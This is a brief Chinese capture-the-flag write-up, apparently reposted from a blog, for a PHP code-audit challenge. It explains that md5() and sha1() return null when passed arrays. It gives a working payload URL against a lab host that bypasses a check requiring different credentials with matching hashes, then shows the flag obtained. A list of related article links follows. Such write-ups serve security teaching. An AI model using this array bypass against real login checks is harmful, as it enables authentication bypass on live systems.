代码审计-md5()函数
username和password不能相同,但是md5又要一致
md5函数存在漏洞,md5不识别数组,返回null,可以进行绕过
同样sha1函数也存在这个漏洞
payload
http://123.206.87.240:9009/18.php?username[]=1&password[]=2
得到
Flag: flag{bugk1u-ad8-3dsa-2}
【代码审计-md5()函数】转载于:https://www.cnblogs.com/gaonuoqi/p/11406954.html
推荐阅读
- CVE-2020-16898|CVE-2020-16898 TCP/IP远程代码执行漏洞
- 不废话,代码实践带你掌握|不废话,代码实践带你掌握 强缓存、协商缓存!
- 工具|后天就是七夕节,你准备好了吗(送上几个七夕代码,展示你技能的时候到了!)
- 《机器学习实战》高清中文版PDF英文版PDF+源代码下载
- 霍兰德职业代码对照表
- Hexo代码块前后空白行问题
- 前端代码|前端代码 返回顶部 backToTop
- 11-代码注入
- 代码不规范容易造成的bug
- 事件解绑与解绑的兼容代码